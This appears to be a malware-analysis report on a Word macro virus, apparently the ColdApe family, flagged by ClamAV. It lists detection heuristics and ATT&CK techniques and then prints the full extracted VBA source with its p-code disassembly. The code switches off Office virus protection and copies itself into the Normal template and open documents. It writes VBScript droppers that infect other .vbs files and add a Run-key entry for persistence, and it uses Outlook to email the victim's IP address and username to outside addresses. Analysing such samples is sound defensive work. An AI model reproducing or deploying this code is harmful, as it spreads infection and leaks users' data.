MALICIOUS
536
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1071.001 Web Protocols
T1566.001 Spearphishing Attachment
The sample contains VBA macros that exhibit self-replication behavior, attempting to copy themselves to the Normal template and the active document. It also includes logic to harvest recipients from the MAPI address book and send itself programmatically, indicative of an email worm. The script also attempts to tamper with virus protection settings and writes values to the registry, suggesting an attempt to establish persistence or evade detection. The ClamAV detection name 'Win.Trojan.ColdApe-1' strongly suggests this family.
Heuristics 12
-
ClamAV: Win.Trojan.ColdApe-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.ColdApe-1
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "wscript c:\happy.vbs", vbHide -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")" -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1)) -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Print #1, "Set theMailItem = theApp.CreateItem(0)" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1)) -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22677 bytes |
SHA-256: e27d9de1e0fedc23253779697c144c28670db29ea51f926b952dd0fc262f719c |
|||
|
Detection
ClamAV:
Doc.Trojan.ColdApe-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoClose()
'AVM
On Error Resume Next
Dim DC, IT As Integer
Application.EnableCancelKey = y
Options.VirusProtection = y
Options.SaveNormalPrompt = y
Options.ConfirmConversions = y
a = ActiveDocument.Saved
If Right(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
End If
If Right(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
IT = (Day(Now))
DC = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC")
If DC = "" Or DC < IT Then
GoOk = True
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC") = IT
End If
TestCon = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS")
If System.PrivateProfileString("", "HKEY_CLASSES_ROOT\VBSFile\ScriptEngine", "") = "VBScript" Then SIY = True
If SIY = True And TestCon <> "Done" Then
Open "c:\happy.vbs" For Output As 1
Print #1, "'§"
Print #1, ""
Print #1, "On Error Resume Next"
Print #1, "Dim IV6, U187, IV7, IV1, IV2, IV3, IV4"
Print #1, "Dim T111"
Print #1, "Dim IV5(200)"
Print #1, "Dim XR"
Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")"
Print #1, "Set WshSysEnv = WSHShell.Environment(""Process"")"
Print #1, "IV10 = WshSysEnv(""Path"")"
Print #1, "IV7 = WSHShell.ExpandEnvironmentStrings(""%windir%\avm.vbs"")"
Print #1, "IV1 = Wscript.ScriptFullName"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "XR = 1"
Print #1, "T11 = Wscript.ScriptFullName"
Print #1, "For x = Len(IV10) To 1 Step -1"
Print #1, "IV4 = Mid(IV10, x, 1)"
Print #1, "If IV4 <> "";"" Then"
Print #1, "IV5(XR) = IV4 + IV5(XR)"
Print #1, "ElseIf IV4 = "";"" Then"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "XR = XR + 1"
Print #1, "End If"
Print #1, "Next"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "IV5(XR + 1) = WSHShell.SpecialFolders(""Desktop"") + ""\"""
Print #1, "IV5(XR + 2) = WSHShell.SpecialFolders(""MyDocuments"") + ""\"""
Print #1, "IV5(XR + 3) = WSHShell.SpecialFolders(""Startup"") + ""\"""
Print #1, "IV5(XR + 4) = Left(T11, InStrRev(T11, ""\""))"
Print #1, "Set TS = IV6.OpenTextFile(T11, 1)"
Print #1, "IV9 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "IV8 = Chr(167)"
Print #1, "endIV8 = ""'"" & IV8"
Print #1, "For x = Len(IV9) To 1 Step -1"
Print #1, "If Mid(IV9, x, 1) = IV8 Then"
Print #1, "x = 1"
Print #1, "IV3 = endIV8 + IV3"
Print #1, "ElseIf Mid(IV9, x, 1) <> IV8 Then"
Print #1, "IV3 = Mid(IV9, x, 1) + IV3"
Print #1, "End If"
Print #1, "Next"
Print #1, "For y = 1 To (XR + 4)"
Print #1, "For Each Target In IV6.GetFolder(IV5(y)).Files"
Print #1, "If UCase(Right(Target.Name, 3)) = ""VBS"" Then"
Print #1, "IV11 = """""
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 1)"
Print #1, "IV11 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "If mid(IV11,(len(IV11)-2),1) <> ""¥"" Then"
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 8)"
Print #1, "TS.Write IV3"
Print #1, "TS.Close"
Print #1, "End If"
Print #1, "End If"
Print #1, "Next"
Print #1, "Next"
Print #1, "FIV11 (IV7)"
Print #1, "If T111 = False Then"
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVM"", IV7"
Print #1, "Set U187 = IV6.OpenTextFile(IV7, 2, True)"
Print #1, "U187.Write IV3"
Print #1, "U187.Close"
Print #1, "End If"
Print #1, "Function FIV11(filespec)"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "If (IV6.FileExists(filespec)) Then"
Print #1, "T111 = True"
Print #1, "Else"
Print #1, "T111 = False"
Print #1, "End If"
Print #1, "End Function"
Print #1, "' Nick ""The Love Monkey"" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia"
Print #1, "'¥"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS") = "Done"
Close 1
Shell "wscript c:\happy.vbs", vbHide
End If
If SIY = True And GoOk = True Then
If Dir("c:\A4.vbs") = "" Then
Open "c:\A4.vbs" For Output As 1
Print #1, "Dim theApp, theNameSpace, theMailItem"
Print #1, "Dim IPSocket"
Print #1, "On Error Resume Next"
Print #1, "Set IPSocket = CreateObject(""MSWinsock.Winsock"")"
Print #1, "IPADDY = IPSocket.LocalIP"
Print #1, "set BOB = CreateObject(""Wscript.Network"")"
Print #1, "For x = 1 To 2"
Print #1, "If x = 1 Then EMADDY = ""avm@nym.alias.net"" Else EMADDY = ""nick@virusbtn.com"""
Print #1, "if x = 1 then MSGBDY = IPADDY else MSGBDY = ""Dear Nicky... my name is " & Application.UserName & " and I want to make hot monkey love with you. You anti-virus stud!"""
Print #1, "Set theApp = WScript.CreateObject(""Outlook.Application"")"
Print #1, "Set theNameSpace = theApp.GetNameSpace(""MAPI"")"
Print #1, "theNameSpace.Logon ""profile"", ""password"""
Print #1, "Set theMailItem = theApp.CreateItem(0)"
Print #1, "theMailItem.Recipients.Add EMADDY"
Print #1, "theMailItem.Subject = BOB.Username"
Print #1, "theMailItem.Body = MSGBDY"
Print #1, "theMailItem.Send"
Print #1, "theNameSpace.Logoff"
Print #1, "Next"
Close 1
End If
Shell "wscript c:\a4.vbs", vbHide
End If
If ActiveDocument.Saved <> a Then ActiveDocument.Saved = a
' Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia
End Sub
' Processing file: /opt/analyzer/scan_staging/533c681581594559b7fac3c09db558f5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15954 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' QuoteRem 0x0000 0x0003 "AVM"
' Line #2:
' OnError (Resume Next)
' Line #3:
' Dim
' VarDefn DC
' VarDefn IT (As Integer)
' Line #4:
' Ld y
' Ld Application
' MemSt EnableCancelKey
' Line #5:
' Ld y
' Ld Options
' MemSt VirusProtection
' Line #6:
' Ld y
' Ld Options
' MemSt SaveNormalPrompt
' Line #7:
' Ld y
' Ld Options
' MemSt ConfirmConversions
' Line #8:
' Ld ActiveDocument
' MemLd Saved
' St a
' Line #9:
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0003
' ArgsLd Right 0x0002
' LitStr 0x0003 "AVM"
' Ne
' IfBlock
' Line #10:
' LitStr 0x000F "Sub AutoClose()"
' Ld vbCr
' Concat
' LitDI2 0x0002
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0001
' Sub
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Concat
' Paren
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #11:
' EndIfBlock
' Line #12:
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0003
' ArgsLd Right 0x0002
' LitStr 0x0003 "AVM"
' Ne
' IfBlock
' Line #13:
' LitStr 0x000E "Sub AutoOpen()"
' Ld vbCr
' Concat
' LitDI2 0x0002
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0001
' Sub
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Concat
' Paren
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #14:
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound 0x0002
' LitStr 0x0008 "Document"
' Ne
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' EndIf
' Line #15:
' EndIfBlock
' Line #16:
' Ld Now
' ArgsLd Day 0x0001
' Paren
' St IT
' Line #17:
' LitStr 0x0000 ""
' LitStr 0x0041 "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0"
' LitStr 0x0006 "AVM-DC"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St DC
' Line #18:
' Ld DC
' LitStr 0x0000 ""
' Eq
' Ld DC
' Ld IT
' Lt
' Or
' IfBlock
' Line #19:
' LitVarSpecial (True)
' St GoOk
' Line #20:
' Ld IT
' LitStr 0x0000 ""
' LitStr 0x0041 "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0"
' LitStr 0x0006 "AVM-DC"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #21:
' EndIfBlock
' Line #22:
' LitStr 0x0000 ""
' LitStr 0x0041 "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0"
' LitStr 0x0007 "AVM-VBS"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St TestCon
' Line #23:
' LitStr 0x0000 ""
' LitStr 0x0026 "HKEY_CLASSES_ROOT\VBSFile\ScriptEngine"
' LitStr 0x0000 ""
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0008 "VBScript"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St SIY
' EndIf
' Line #24:
' Ld SIY
' LitVarSpecial (True)
' Eq
' Ld TestCon
' LitStr 0x0004 "Done"
' Ne
' And
' IfBlock
' Line #25:
' LitStr 0x000C "c:\happy.vbs"
' LitDI2 0x0001
' LitDefault
' Open (For Output)
' Line #26:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0002 "'§"
' PrintItemNL
' Line #27:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #28:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "On Error Resume Next"
' PrintItemNL
' Line #29:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0026 "Dim IV6, U187, IV7, IV1, IV2, IV3, IV4"
' PrintItemNL
' Line #30:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0008 "Dim T111"
' PrintItemNL
' Line #31:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "Dim IV5(200)"
' PrintItemNL
' Line #32:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "Dim XR"
' PrintItemNL
' Line #33:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0034 "Set WSHShell = Wscript.CreateObject("Wscript.Shell")"
' PrintItemNL
' Line #34:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002F "Set WshSysEnv = WSHShell.Environment("Process")"
' PrintItemNL
' Line #35:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0018 "IV10 = WshSysEnv("Path")"
' PrintItemNL
' Line #36:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x003B "IV7 = WSHShell.ExpandEnvironmentStrings("%windir%\avm.vbs")"
' PrintItemNL
' Line #37:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001C "IV1 = Wscript.ScriptFullName"
' PrintItemNL
' Line #38:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0034 "Set IV6 = CreateObject("Scripting.FileSystemObject")"
' PrintItemNL
' Line #39:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "XR = 1"
' PrintItemNL
' Line #40:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001C "T11 = Wscript.ScriptFullName"
' PrintItemNL
' Line #41:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001E "For x = Len(IV10) To 1 Step -1"
' PrintItemNL
' Line #42:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0015 "IV4 = Mid(IV10, x, 1)"
' PrintItemNL
' Line #43:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "If IV4 <> ";" Then"
' PrintItemNL
' Line #44:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0017 "IV5(XR) = IV4 + IV5(XR)"
' PrintItemNL
' Line #45:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0015 "ElseIf IV4 = ";" Then"
' PrintItemNL
' Line #46:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0017 "IV5(XR) = IV5(XR) + "\""
' PrintItemNL
' Line #47:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "XR = XR + 1"
' PrintItemNL
' Line #48:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End If"
' PrintItemNL
' Line #49:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #50:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0017 "IV5(XR) = IV5(XR) + "\""
' PrintItemNL
' Line #51:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "IV5(XR + 1) = WSHShell.SpecialFolders("Desktop") + "\""
' PrintItemNL
' Line #52:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x003A "IV5(XR + 2) = WSHShell.SpecialFolders("MyDocuments") + "\""
' PrintItemNL
' Line #53:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "IV5(XR + 3) = WSHShell.SpecialFolders("Startup") + "\""
' PrintItemNL
' Line #54:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002B "IV5(XR + 4) = Left(T11, InStrRev(T11, "\"))"
' PrintItemNL
' Line #55:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0021 "Set TS = IV6.OpenTextFile(T11, 1)"
' PrintItemNL
' Line #56:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0010 "IV9 = TS.ReadAll"
' PrintItemNL
' Line #57:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0008 "TS.Close"
' PrintItemNL
' Line #58:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "IV8 = Chr(167)"
' PrintItemNL
' Line #59:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "endIV8 = "'" & IV8"
' PrintItemNL
' Line #60:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001D "For x = Len(IV9) To 1 Step -1"
' PrintItemNL
' Line #61:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001C "If Mid(IV9, x, 1) = IV8 Then"
' PrintItemNL
' Line #62:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0005 "x = 1"
' PrintItemNL
' Line #63:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "IV3 = endIV8 + IV3"
' PrintItemNL
' Line #64:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0021 "ElseIf Mid(IV9, x, 1) <> IV8 Then"
' PrintItemNL
' Line #65:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "IV3 = Mid(IV9, x, 1) + IV3"
' PrintItemNL
' Line #66:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End If"
' PrintItemNL
' Line #67:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #68:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0015 "For y = 1 To (XR + 4)"
' PrintItemNL
' Line #69:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002E "For Each Target In IV6.GetFolder(IV5(y)).Files"
' PrintItemNL
' Line #70:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002C "If UCase(Right(Target.Name, 3)) = "VBS" Then"
' PrintItemNL
' Line #71:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0009 "IV11 = """
' PrintItemNL
' Line #72:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0032 "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 1)"
' PrintItemNL
' Line #73:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0011 "IV11 = TS.ReadAll"
' PrintItemNL
' Line #74:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0008 "TS.Close"
' PrintItemNL
' Line #75:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0028 "If mid(IV11,(len(IV11)-2),1) <> "¥" Then"
' PrintItemNL
' Line #76:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0032 "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 8)"
' PrintItemNL
' Line #77:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "TS.Write IV3"
' PrintItemNL
' Line #78:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0008 "TS.Close"
' PrintItemNL
' Line #79:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End If"
' PrintItemNL
' Line #80:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End If"
' PrintItemNL
' Line #81:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #82:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #83:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "FIV11 (IV7)"
' PrintItemNL
' Line #84:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "If T111 = False Then"
' PrintItemNL
' Line #85:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x005D "WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVM", IV7"
' PrintItemNL
' Line #86:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0029 "Set U187 = IV6.OpenTextFile(IV7, 2, True)"
' PrintItemNL
' Line #87:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "U187.Write IV3"
' PrintItemNL
' Line #88:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000A "U187.Close"
' PrintItemNL
' Line #89:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End If"
' PrintItemNL
' Line #90:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0018 "Function FIV11(filespec)"
' PrintItemNL
' Line #91:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0034 "Set IV6 = CreateObject("Scripting.FileSystemObject")"
' PrintItemNL
' Line #92:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0022 "If (IV6.FileExists(filespec)) Then"
' PrintItemNL
' Line #93:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "T111 = True"
' PrintItemNL
' Line #94:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Else"
' PrintItemNL
' Line #95:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "T111 = False"
' PrintItemNL
' Line #96:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End If"
' PrintItemNL
' Line #97:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "End Function"
' PrintItemNL
' Line #98:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x005C "' Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia"
' PrintItemNL
' Line #99:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0002 "'¥"
' PrintItemNL
' Line #100:
' LitStr 0x0004 "Done"
' LitStr 0x0000 ""
' LitStr 0x0041 "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0"
' LitStr 0x0007 "AVM-VBS"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #101:
' LitDI2 0x0001
' Close 0x0001
' Line #102:
' LitStr 0x0014 "wscript c:\happy.vbs"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #103:
' EndIfBlock
' Line #104:
' Ld SIY
' LitVarSpecial (True)
' Eq
' Ld GoOk
' LitVarSpecial (True)
' Eq
' And
' IfBlock
' Line #105:
' LitStr 0x0009 "c:\A4.vbs"
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #106:
' LitStr 0x0009 "c:\A4.vbs"
' LitDI2 0x0001
' LitDefault
' Open (For Output)
' Line #107:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0025 "Dim theApp, theNameSpace, theMailItem"
' PrintItemNL
' Line #108:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "Dim IPSocket"
' PrintItemNL
' Line #109:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "On Error Resume Next"
' PrintItemNL
' Line #110:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0030 "Set IPSocket = CreateObject("MSWinsock.Winsock")"
' PrintItemNL
' Line #111:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0019 "IPADDY = IPSocket.LocalIP"
' PrintItemNL
' Line #112:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0029 "set BOB = CreateObject("Wscript.Network")"
' PrintItemNL
' Line #113:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "For x = 1 To 2"
' PrintItemNL
' Line #114:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004C "If x = 1 Then EMADDY = "avm@nym.alias.net" Else EMADDY = "nick@virusbtn.com""
' PrintItemNL
' Line #115:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0046 "if x = 1 then MSGBDY = IPADDY else MSGBDY = "Dear Nicky... my name is "
' Ld Application
' MemLd UserName
' Concat
' LitStr 0x0043 " and I want to make hot monkey love with you. You anti-virus stud!""
' Concat
' PrintItemNL
' Line #116:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0038 "Set theApp = WScript.CreateObject("Outlook.Application")"
' PrintItemNL
' Line #117:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002E "Set theNameSpace = theApp.GetNameSpace("MAPI")"
' PrintItemNL
' Line #118:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0028 "theNameSpace.Logon "profile", "password""
' PrintItemNL
' Line #119:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0026 "Set theMailItem = theApp.CreateItem(0)"
' PrintItemNL
' Line #120:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0021 "theMailItem.Recipients.Add EMADDY"
' PrintItemNL
' Line #121:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0022 "theMailItem.Subject = BOB.Username"
' PrintItemNL
' Line #122:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0019 "theMailItem.Body = MSGBDY"
' PrintItemNL
' Line #123:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0010 "theMailItem.Send"
' PrintItemNL
' Line #124:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0013 "theNameSpace.Logoff"
' PrintItemNL
' Line #125:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #126:
' LitDI2 0x0001
' Close 0x0001
' Line #127:
